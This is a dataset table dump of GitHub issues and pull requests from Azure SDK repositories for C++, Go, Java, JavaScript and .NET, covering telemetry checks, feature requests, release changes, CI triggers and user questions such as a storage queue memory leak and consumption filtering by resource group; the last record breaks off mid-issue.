added
stringdate 2025-04-01 04:05:38
2025-04-01 07:14:06
| created
timestamp[us]date 2001-10-09 16:19:16
2025-01-01 03:51:31
| id
stringlengths 4
10
| metadata
dict | source
stringclasses 2
values | text
stringlengths 0
1.61M
|
|---|---|---|---|---|---|
2025-04-01T06:36:45.236637
| 2021-08-11T22:11:29
|
967553270
|
{
"authors": [
"antkmsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:323",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/issues/2738"
}
|
gharchive/issue
|
Investigate telemetry possibly not getting in?
From @kyle-patterson:
"[...] I can see that for storage up through -beta.9, but there's no new data coming in from libraries since then. And for keyvault, I can only see two instances of "azsdk-cpp-keyvault/7.2 {os info...}" , where I would have expected keyvault-keys (and more data coming through...) [...]
It almost seems like there was a change in core in the june or july release, but I haven't found anything yet that seems related...
I did confirm that keyvault is passing the expected value when creating the ttp pipeline: https://github.com/Azure/azure-sdk-for-cpp/blob/83295c69edc5d2a6594c09fcd06eae7073753171/sdk/keyvault/azure-security-keyvault-keys/src/key_client.cpp#L28
it's not hyper-critical, but I'd like to get it resolved in the next release so that we can start getting data again..."
I wrote a simple app that invokes key creation API.
In order to avoid setting up HTTPS decryption on my local machine, I modified the SDK to send requests to a different server on the internet instead of Azure, and read headers there. I compiled with both libcurl and WinHTTP transport adapters. Both have azsdk-cpp-keyvault-keys/7.2 (Windows 10 Enterprise 6.3 19043 19041.1.amd64fre.vb_release.191206-1406) as User-Agent header. (Note that the version does not match the package version, I opened a bug for that - https://github.com/Azure/azure-sdk-for-cpp/issues/2765). But other than that, it look like everything works as it supposed to.
@kyle-patterson can see the telemetry now, I won't post much detail here (not that there's something secret-worthy or sensational was found). Kyle, please reactivate or talk to me if you see problems.
|
2025-04-01T06:36:45.240824
| 2021-10-27T08:00:50
|
1037098577
|
{
"authors": [
"Jinming-Hu",
"vhvb1989"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:324",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/issues/3000"
}
|
gharchive/issue
|
Feature request: Core SDK should support HTTP request with request body and non-buffered(stream) response
Currently we have three constructor overloads:
with request body, buffered response
without request body, non-buffered response
without request body, buffered response
Storage SDK needs HTTP request with request body and non-buffered(stream) response to implement Query Blob Content
reopen since it was reverted in https://github.com/Azure/azure-sdk-for-cpp/pull/3033
@vhvb1989 Can you share a timeline for fixing this issue?
@vhvb1989 Can you share a timeline for fixing this issue?
I did in the past with: https://github.com/Azure/azure-sdk-for-cpp/pull/3002
However, I reverted it as it was not yet required from storage. So, feel free to re-apply the changes from that PR together with the Storage feature that it requires it.
OK, that works for me.
|
2025-04-01T06:36:45.245661
| 2021-03-23T01:35:20
|
838244939
|
{
"authors": [
"Jinming-Hu"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:325",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/pull/1957"
}
|
gharchive/pull-request
|
mint storage beta 9
Pull Request Checklist
Please leverage this checklist as a reminder to address commonly occurring feedback when submitting a pull request to make sure your PR can be reviewed quickly:
See the detailed list in the contributing guide.
[x] C++ Guidelines
[x] Doxygen docs
[x] Unit tests
[x] No unwanted commits/changes
[x] Descriptive title/description
[x] PR is single purpose
[x] Related issue listed
[x] Comments in source
[x] No typos
[x] Update changelog
[x] Not work-in-progress
[x] External references or docs updated
[x] Self review of PR done
[x] Any breaking changes?
/azp run cpp - storage
/azp run cpp - storage
/azp run cpp - storage
|
2025-04-01T06:36:45.252779
| 2022-06-03T17:57:49
|
1260195432
|
{
"authors": [
"LarryOsterman",
"RickWinter"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:326",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/pull/3705"
}
|
gharchive/pull-request
|
Removed version>= fields for openssl in vcpkg.json files
Remove version>= fields from vcpkg.json files.
Fixes #3703
These fields are broken because:
These fields are illegal in the vcpkg schema because version>= only works with semver version numbers and 1.1.1n is not a legal semver version number.
We rely on the vcpkg baseline to determine which version of openssl we use, currently 3.0.2.
Pull Request Checklist
Please leverage this checklist as a reminder to address commonly occurring feedback when submitting a pull request to make sure your PR can be reviewed quickly:
See the detailed list in the contributing guide.
[X] C++ Guidelines
[X] Doxygen docs
[X] Unit tests
[X] No unwanted commits/changes
[X] Descriptive title/description
[X] PR is single purpose
[X] Related issue listed
[X] Comments in source
[X] No typos
[X] Update changelog
[X] Not work-in-progress
[X] External references or docs updated
[X] Self review of PR done
[X] Any breaking changes?
Would it be best to have version >= 3.0.2 to ensure its at least of that version?
Would it be best to have version >= 3.0.2 to ensure its at least of that version?
A great question, not 100% sure to be honest. We define the version we take from our vcpkg baseline (eng\vcpkg-commit.txt) and we'll pick the version of whatever vcpkg has at that point. As I understand it, the version overrides are there if we specifically require functionality which might be different from the baseline (typically older than the baseline).
If we just want to use whatever the baseline has, we should leave it blank.
|
2025-04-01T06:36:45.255975
| 2020-06-19T15:15:06
|
642043652
|
{
"authors": [
"ArcturusZhang",
"ctaggart"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:327",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/issues/10683"
}
|
gharchive/issue
|
package should be named "avs", not "vmware"
The package should be named "avs", not "vmware". #10454 was merged before I had a chance to review. Please rename the package. See also https://github.com/Azure/sdk-release-request/issues/496.
Current location:
https://github.com/Azure/azure-sdk-for-go/tree/master/services/preview/vmware/mgmt/2019-08-09-preview/vmware
Should be:
https://github.com/Azure/azure-sdk-for-go/tree/master/services/preview/avs/mgmt/2019-08-09-preview/avs
Hi @ctaggart sorry for that... I will change it, release it and remove the wrong-named package in the next major version release (at the end of this month)
Should be resolved in v44.0.0
thank you @ArcturusZhang ! ❤️
|
2025-04-01T06:36:45.259482
| 2021-07-08T16:22:01
|
940025381
|
{
"authors": [
"seankane-msft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:328",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/issues/15004"
}
|
gharchive/issue
|
[Tables] Shared Access Signature Capabilities
Adding SAS capabilities to the Tables SDK
[ ] Add Shared Access Signature credential
[ ] SharedAccessSignaturePolicy for signing requests properly
[ ] generate_account_sas method
[ ] generate_table_sas method
[ ] TableSasPermission object
[ ] AccountSasPermissions object
[ ] ResourceTypes object
[ ] AccountSasPermissions object
Python implementation: https://github.com/Azure/azure-sdk-for-python/pull/15946
|
2025-04-01T06:36:45.260958
| 2021-04-22T18:03:07
|
865267964
|
{
"authors": [
"azure-sdk",
"weshaggard"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:329",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/pull/14581"
}
|
gharchive/pull-request
|
Sync eng/common directory with azure-sdk-tools for PR 1562
Sync eng/common directory with azure-sdk-tools for PR https://github.com/Azure/azure-sdk-tools/pull/1562 See eng/common workflow
/check-enforcer reset
|
2025-04-01T06:36:45.263912
| 2021-08-16T18:38:46
|
972002126
|
{
"authors": [
"TomArcherMsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:330",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/pull/15301"
}
|
gharchive/pull-request
|
Fixed bugs in Resource Group demo code
[ ] The purpose of this PR is explained in this or a referenced issue.
[ ] The PR does not update generated files.
These files are managed by the codegen framework at Azure/autorest.go.
[ ] Tests are included and/or updated for code changes.
[ ] Updates to CHANGELOG.md are included.
[ ] MIT license headers are included in each file.
@RickWinter I believe I fixed the indentation.
|
2025-04-01T06:36:45.265729
| 2016-12-01T17:07:21
|
192905819
|
{
"authors": [
"martinsawicki",
"paulojohnj"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:331",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/issues/1299"
}
|
gharchive/issue
|
route table / route / subnet association
Is there a path for managing route table / routes and their subnet association in beta3 ? The SDK points for route table creation, route management and subnet association in beta4 are great and are working perfectly. However, since I am currently required to use released or final code as dependencies, is there any way to manage these same things via beta3 or interaction with an ARM template (don't believe ARM templates allow for update only deploy)
not easily - there may be a workaround via the use of .inner() of the various involved objects, but that approach will get very hairy very quickly....
beta4 is coming out in about 1-2 weeks though, so better just wait for that.
Ahh beta4 is the answer I was hoping for and needed to know a timeline but was not sure where to ask. Thank you very much for the prompt respond, and I believe an ARM template can be used temporarily in the mean time.
|
2025-04-01T06:36:45.271272
| 2020-09-24T22:57:54
|
708523493
|
{
"authors": [
"alzimmermsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:332",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/15646"
}
|
gharchive/pull-request
|
Decouple PagedIterable and PagedFlux to Prevent Background Page Requests
Fixes #15575
This PR decouples some ContinuablePagedIterable implementations from ContinuablePagedFlux when the ContinuablePagedFlux implementation is an instanceof ContinuablePagedFluxCore. This change allows for finer control of page enumeration by removing our dependency on Reactor's toIterable and toStream implementations on a Flux.
Previously, when our implementation used Reactor's toIterable and toStream to implement ContinuablePagedIterable's functionality we would see additional pages getting requested. Calling into these methods we passed a batchSize of 1 which indicated to the backing Flux to only request one element, paged, from upstream at time. But this also served a dual purpose of internal tracking for the backing enumerable to determine when it needed to make additional requests to upstream, so on every next iteration it would hit its internal limit of 1 and make another page request. So, calling ContinuablePagedIterable.streamByPage().findFirst() or ContinuablePagedIterable.iterableByPage().iterator().next() would result in two page requests. Additionally, due to the reactive, event loop, driven nature of the backing enumerable these additional page requests could happen after the execution of the mentioned calling patterns completed.
Now, during construction of ContinuablePagedIterable we will check the instanceof the backing ContinuablePagedFlux and if it is ContinuablePagedFluxCore the PageRetriever and batchSize configuration will be taken from the object and ContinuablePagedIterable will handle page enumeration with finer grain controls. To maintain current functionality that Flux.toStream() has a page will be eagerly requested when a Iterator or Stream is created from the ContinuablePagedIterable. Internally, these will be backed by one of two Iterable implementations, ContinuablePagedByItemIterable or ContinuablePagedByPageIterable. The implementations will only make additional page requests when needed, for page item iterators it will be when the most recently retrieved page has no additional elements and for page iterators it will be once the next page is requested. The page requests will be blocking which is functionally equivalent to the previous experience, where both implementations would throw if called from within a non-blocking reactive thread.
In the future we may investigate completely decoupling ContinuablePagedIterable and ContinuablePagedFlux by having both be constructed with PagedRetriever and handle their own enumeration of pages.
/azp run java - appconfiguration - tests
|
2025-04-01T06:36:45.273127
| 2020-11-05T07:33:39
|
736688332
|
{
"authors": [
"vcolin7"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:333",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/17209"
}
|
gharchive/pull-request
|
Added support for encryption algorithms for symmetric keys
Fixes #14805.
Tests are pending.
A few changes required yet, but I'm signing off to unblock. Also, LocalKeyCryptographyClient->LocalCryptographyClient if you haven't GA'd it yet.
We have already GA'd a public LocalCryptographyClient. In the case of LocalKeyCryptographyClient, it's just an abstract class that we extend from for our different internal clients for EC, RSA and AES key operations.
|
2025-04-01T06:36:45.275414
| 2021-11-17T11:57:04
|
1056043391
|
{
"authors": [
"azure-sdk",
"moarychan"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:334",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/25470"
}
|
gharchive/pull-request
|
Make the dependency versions the same with SDK Bom managed
As title.
API changes have been detected in com.azure:azure-core. You can review API changes here
API changes
+ public enum ErrorOptions {
+ THROW,
+ NO_THROW;
+ }
+ public RequestOptions setErrorOptions(EnumSet<ErrorOptions> errorOptions)
We decided not to use Azure SDK Bom first, so I close this PR now.
|
2025-04-01T06:36:45.278238
| 2023-05-05T21:56:23
|
1698236882
|
{
"authors": [
"alzimmermsft",
"azure-sdk",
"ibrahimrabab"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:335",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/34820"
}
|
gharchive/pull-request
|
STG88 Features
Description
This PR introduces service version support for 2023-01-03, and the following STG88 features:
High Throughput Append Blob for AppendBlobClient
File Share List Handles Access Rights
Add Owner, Group, and Permissions to PathProperties for DataLake
API change check
API changes are not detected in this pull request.
/azp run java - storage - tests
/check-enforcer override
/azp run java - storage - tests
/check-enforcer override
|
2025-04-01T06:36:45.279960
| 2019-05-06T21:01:06
|
440885234
|
{
"authors": [
"AutorestCI"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:336",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/3554"
}
|
gharchive/pull-request
|
[AutoPR graphrbac/data-plane] graph: fix invalid types of accountEnabled
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/5873
This PR has been merged into https://github.com/Azure/azure-sdk-for-java/pull/3099
|
2025-04-01T06:36:45.283870
| 2023-11-09T06:25:09
|
1984920412
|
{
"authors": [
"azure-sdk",
"xinlian12"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:337",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/37591"
}
|
gharchive/pull-request
|
fix429EscapeE2ETimeout
Changes included:
Fixed Issue https://github.com/Azure/azure-sdk-for-java/issues/37419
Issue
429 escaped e2e timeout gating.
Root cause
Currently, the E2ETimeout for point operations is not sitting on top of ClientRetryPolicy, which means for each retry from ClientRetryPolicy will reset the e2e timeout timer.
Fix
For point operations, E2E timeout should be gated for all retries by client retry policy
Fixed Issue https://github.com/Azure/azure-sdk-for-java/issues/37589
Issue
E2E timeout is not being applied for readMany (Query cases)
Fix
Apply E2E timeout for readMany query as well
API change check
API changes are not detected in this pull request.
/azp run java - cosmos - tests
|
2025-04-01T06:36:45.286043
| 2024-10-17T03:58:02
|
2593544038
|
{
"authors": [
"XiaofeiCao",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:338",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/42386"
}
|
gharchive/pull-request
|
[Automation] Generate Fluent Lite from Swagger mariadb#package-2020-01-01
[Automation] Generate Fluent Lite from Swagger mariadb#package-2020-01-01
/azp run java - mariadb - ci
API change check
APIView has identified API level changes in this PR and created following API reviews.
com.azure.resourcemanager:azure-resourcemanager-mariadb
|
2025-04-01T06:36:45.290080
| 2019-12-13T01:48:52
|
537304496
|
{
"authors": [
"kushagraThapar"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:339",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/6818"
}
|
gharchive/pull-request
|
Release changes for 3.4.1
Changefeed bug fixes (includes all the bug fixes released in 3.3.3)
Disaster Recovery related bug fixes
Exception when Cosmos DB HTTP response header is larger than 8192 bytes: https://github.com/Azure/azure-sdk-for-java/issues/6069
Vulnerability through dependency in the SDK v3.4.0: https://github.com/Azure/azure-sdk-for-java/issues/6433
CosmosSyncScripts null pointer exception in azure-cosmos: https://github.com/Azure/azure-sdk-for-java/issues/6281
Default consistency level parsing for Bounded Staleness and Consistent Prefix: https://github.com/Azure/azure-sdk-for-java/issues/6707
Null Value Holder change: https://github.com/Azure/azure-sdk-for-java/issues/6307
Closing this PR as there are breaking changes with azure-data-sdk-parent v1.2.0 with latest azure-cosmos pom files.
|
2025-04-01T06:36:45.292495
| 2021-03-08T03:37:18
|
824133234
|
{
"authors": [
"aadamsx",
"ramya-rao-a",
"zfoster"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:340",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/14157"
}
|
gharchive/issue
|
[Cosmos] When are we getting Deno drivers?
Are Cosmos drivers for Deno in the works? We now have MongoDB https://github.com/denodrivers/deno_mongo and all the others -- but no Cosmos. Why don't I see any mention of this? Where are the drivers to use Azure blob storage? How can one use Deno within Azure without any hooks into the services layer?
#13281 is the issue that we are using to track all discussions around deno support in Azure SDKs
@zfoster, @southpolesteve If you have nothing to add here that will be specific to cosmos, I would recommend moving this conversation to #13281
cc @bterlson, @xirzec, @chradek
Yep that sounds good, thanks! nothing I can think of so closing this one
|
2025-04-01T06:36:45.310496
| 2022-01-13T13:54:12
|
1101775443
|
{
"authors": [
"BasiaMH",
"qiaozha"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:341",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/19835"
}
|
gharchive/issue
|
Sorting arm-consumption 'usage details' by resource group
I am using the arm-consumption package to get the usage details for a subscription and finding it difficult to sort the results in a meaningful way. I need to get them by resource group, but 1) it does not appear to be possible to filter the details by resource group when getting the data from azure and 2) the 'resource group' property on the usage details items does not correspond directly to the resource group, i.e., if the resource group is called 'ExampleGroup' (as per arm-resources or portal.azure.com), the usage details property 'resource group' is a longer string which appears to begin with the first few letters of the resource group but not in a consistent enough way to use to search. (There are a larger number of 'resource groups' appearing in arm-consumption than in arm-resources, and their names do not appear to correlate in a consistent, searchable way).
I would like to either be able to use a resource group filter when fetching the usage details, and/or have a property in the usage details that gives the resource group of the item as defined in arm-resources.
I have tried getting all the usage details data and sorting it myself by resource group, however then I encounter the problem where the resource group name that I need to sort by is not a property of the usage details items.
I have also tried looking to see if there is any existing API that provides a map between the arm-resources resource groups names and the arm-consumption resource group names, but have not so far found one.
@BasiaMH I think you can pass a scope parameter to get all the usage details within one resource group https://github.com/Azure/azure-rest-api-specs/blob/main/specification/consumption/resource-manager/Microsoft.Consumption/stable/2021-10-01/examples/UsageDetailsListByManagementGroup.json#L6 . let me know if that works for you ? Thanks
Thanks,
I can pass subscriptions/{subscriptionId} in the scope, which returns all
usage details for our subscription, but if I try to pass the
resourceGroups/{resourceGroupName} I get no results.
What is returned is an array with one item, containing a url
https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export
And when I navigate to the url it just gives an error message:
Either: "The resource you are looking for has been removed, had its name
changed, or is temporarily unavailable."
or:
{"message":"No HTTP resource was found that matches the request URI
'https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export'.","messageDetail":"No
route providing a controller name was found to match request URI
'https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export'"}
Basia
On Fri, Jan 14, 2022 at 3:22 AM Qiaoqiao Zhang @.***>
wrote:
@BasiaMH https://github.com/BasiaMH I think you can pass a scope
parameter to get all the usage details within one resource group
https://github.com/Azure/azure-rest-api-specs/blob/main/specification/consumption/resource-manager/Microsoft.Consumption/stable/2021-10-01/examples/UsageDetailsListByManagementGroup.json#L6
. let me know if that works for you ? Thanks
—
Reply to this email directly, view it on GitHub
https://github.com/Azure/azure-sdk-for-js/issues/19835#issuecomment-1012906456,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AFJXFDSC4B3G53GBYR3R4MDUV7MLNANCNFSM5L343HJQ
.
Triage notifications on the go with GitHub Mobile for iOS
https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675
or Android
https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
You are receiving this because you were mentioned.Message ID:
@.***>
@BasiaMH Did you pass the scope like /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName} ?
That's exactly what I tried, yes.
(Before that I tried including resourceGroups in a filter, but that just
returned all the data unfiltered.)
On Sun., Jan. 16, 2022, 8:52 p.m. Qiaoqiao Zhang, @.***>
wrote:
@BasiaMH https://github.com/BasiaMH Did you pass the scope like
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName} ?
—
Reply to this email directly, view it on GitHub
https://github.com/Azure/azure-sdk-for-js/issues/19835#issuecomment-1014065383,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AFJXFDWW4TZVRKOVU5UWZFLUWNY4DANCNFSM5L343HJQ
.
Triage notifications on the go with GitHub Mobile for iOS
https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675
or Android
https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
You are receiving this because you were mentioned.Message ID:
@.***>
Looks like we need some help from service team.
@mitagarg Is it possible that you could help here, as I see you are the author of this PR https://github.com/Azure/azure-rest-api-specs/pull/17013
Hi, is there any update or further information on this problem? Or a different workaround someone could suggest to somehow get the usage and cost per resource or per resource group?
Thanks
@BasiaMH Hi, Since this is probably an issue on the service side, Could you open a ticket here https://docs.microsoft.com/en-us/answers/topics/azure-cost-management.html so that you can get direct support from the service team ?
|
2025-04-01T06:36:45.316493
| 2019-05-02T03:55:14
|
439417810
|
{
"authors": [
"ramya-rao-a"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:342",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/2660"
}
|
gharchive/issue
|
[Event Hubs] Re-visit all parameter validations
Relevant sections from General guidelines:
The client library will have a client object with several methods that call methods on the service. Service parameters are directly passed across the wire to an Azure service. Client parameters are not passed directly to the service, but used within the SDK to fulfill the request. Examples of client parameters include values that are used to construct a URI, or a file that needs to be uploaded to storage.
✅ DO validate client parameters.
⛔️ DO NOT validate service parameters. This includes null checks, empty strings, and other common validating conditions. Let the service validate any request parameters.
✅ DO validate the developer experience when the service parameters are invalid to ensure appropriate error messages are generated by the service. If the developer experience is compromised due to service-side error messages, work with the service team to correct prior to release.
Relevant sections from Typescript guidelines:
YOU SHOULD coerce incorrect types into an appropriate type, if possible. JavaScript users expect some amount of fuzziness with parameters as the standard library tends to coerce types if possible. TypeScript users should get pedantic types as they have opted in to types and expect errors.
Relevant work done in Service Bus regarding this: https://github.com/Azure/azure-sdk-for-js/issues/1145#issuecomment-481893308
Please use the parameter validations done in Service Bus as a reference
Main points to be kept in mind for parameter validations
Missing mandatory arguments should throw an error.
If expected type for an argument is string, use String() to convert given value to string. This is to ensure that we do our best to coerce given input to string for our Javascript users
If expected type for an argument is an array, given value is not an array, then make an array out of the given value
If given value doesnt match expected type and this results in us not being able to form a request to the service, then throw error.
For reference, see what was done for Service Bus
Done with #3652
|
2025-04-01T06:36:45.318443
| 2020-04-29T03:47:20
|
608757284
|
{
"authors": [
"danieljurek",
"praveenkuttappan",
"ramya-rao-a"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:343",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/8594"
}
|
gharchive/issue
|
Propagate changes to work around DNS resolution issue in Linux
See: https://github.com/Azure/azure-sdk-for-java/pull/10576/files
We've seen issues where DNS resolution fails in Ubuntu 18. This workaround fixes that problem. This only needs to run on Ubuntu 18 instances.
@chradek, @richardpark-msft Any chance this can solve our dns woes with linux in SB and EH?
Closing this issue. We already have this integrated with a step to bypass local DNS using common template.
|
2025-04-01T06:36:45.321170
| 2021-02-23T00:55:27
|
813997040
|
{
"authors": [
"JoshuaLai",
"beltr0n"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:344",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/13927"
}
|
gharchive/pull-request
|
Bertong sms impl
This draft PR is to solicit feedback, primarily on whether what i'm testing is appropriate and consistent with what we hve done
/azp run python - communication - tests
/azp run js - communication - tests
/check-enforcer reset
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
|
2025-04-01T06:36:45.322550
| 2024-02-28T08:04:40
|
2158349036
|
{
"authors": [
"azure-sdk",
"kazrael2119"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:345",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/28697"
}
|
gharchive/pull-request
|
push communication-email recordings
fix https://github.com/Azure/azure-sdk-for-js/issues/28656
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.324009
| 2024-10-28T05:40:53
|
2617358821
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:346",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/31544"
}
|
gharchive/pull-request
|
Post release automated changes for databoundaries releases
Post release automated changes for azure-arm-databoundaries
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.325593
| 2020-02-07T16:09:24
|
561731350
|
{
"authors": [
"sadasant"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:347",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/7290"
}
|
gharchive/pull-request
|
[core-amqp] Fixed a build error on master
Seems like a fitting solution for a problem we're having on master.
The error is visible here: https://dev.azure.com/azure-sdk/public/_build/results?buildId=255040&view=logs&j=23e2e6de-b7c3-5918-7121-f16b46172e49&t=9c960e92-0110-52f6-5b54-96f3b7fea4ea&l=697
This isn't necessary. My master was outdated.
|
2025-04-01T06:36:45.333068
| 2020-03-16T01:35:30
|
581920916
|
{
"authors": [
"Petermarcu",
"jesuissur",
"seanmcc-msft",
"speedy-ms"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:348",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/10626"
}
|
gharchive/issue
|
[BUG] Memory Leaking When SDK Combined With Application Insights
Describe the bug
When using the Azure.Storage.Queues (v 12.3.0) NuGet package in combination with Microsoft.ApplicationInsights.AspNetCore (v 2.13.1) in a .Net core 3.1 application that is constantly polling queues for new messages, we find that the number of objects built up in memory is steadily increasing, specifically:
Microsoft.ApplicationInsights.DependencyCollector.Implementation.AzureSdkDiagnosticsEventHandler - creating about 5000 objects a minute and the garbage collector is not disposing them.
Expected behavior
That the AI objects would be cleaned up by the GC
Actual behavior (include Exception or Stack Trace)
Eventually the app will start throwing OutOfMemoryExceptions.
To Reproduce
Have the following in your app startup:
public void ConfigureServices(IServiceCollection services)
{
services.AddApplicationInsightsTelemetry();
}
Add a hosted service:
var host = new WebHostBuilder()
.UseKestrel()
.ConfigureServices(c => c.AddHostedService<QueueWorker>())
Have the worker constantly new up a QueueClient to check for queue messages.
Environment:
Azure.Storage.Queues 12.3.0
.NET runtime version 3.1.101
IDE and version : Visual Studio Professional v 16.4.5
For step 3, why not have the worker re-use the same QueueClient? The clients are thread-safe.
That has proven to be the workaround we have gone with - storing any queue clients that we have created in a static dictionary that remains for the lifetime of the app (we have a web app that uses this shared code and would be newing up the clients pretty heavily to create queue messages).
I will leave it open and for others to decide if this is a bug that needs fixing or if it was simply of a case of us "using it wrong" in which case it can be closed.
We're tracking getting this documented for all clients in this issue. https://github.com/Azure/azure-sdk-for-net/issues/8941.
Hi there
We understand the recommended way is to use a single client though isn't still a bug having a memory leak because many clients are created?
In our specific case, we created a lot of clients for an hour or so at night and the memory is never release even days after.
We will use a single client in the future, so thanks to @speedy-ms
Thanks
Phil
|
2025-04-01T06:36:45.342209
| 2023-03-20T08:02:05
|
1631585358
|
{
"authors": [
"Arvinorange",
"jsquire",
"live1206"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:349",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/35002"
}
|
gharchive/issue
|
[QUERY] Azure .NET SDK for web app/function app creation and deployment
Library name and version
Microsoft.Azure.Management.AppService
Query/Question
Hi,
I would like to do the below commands from the CLI in the SDK instead.
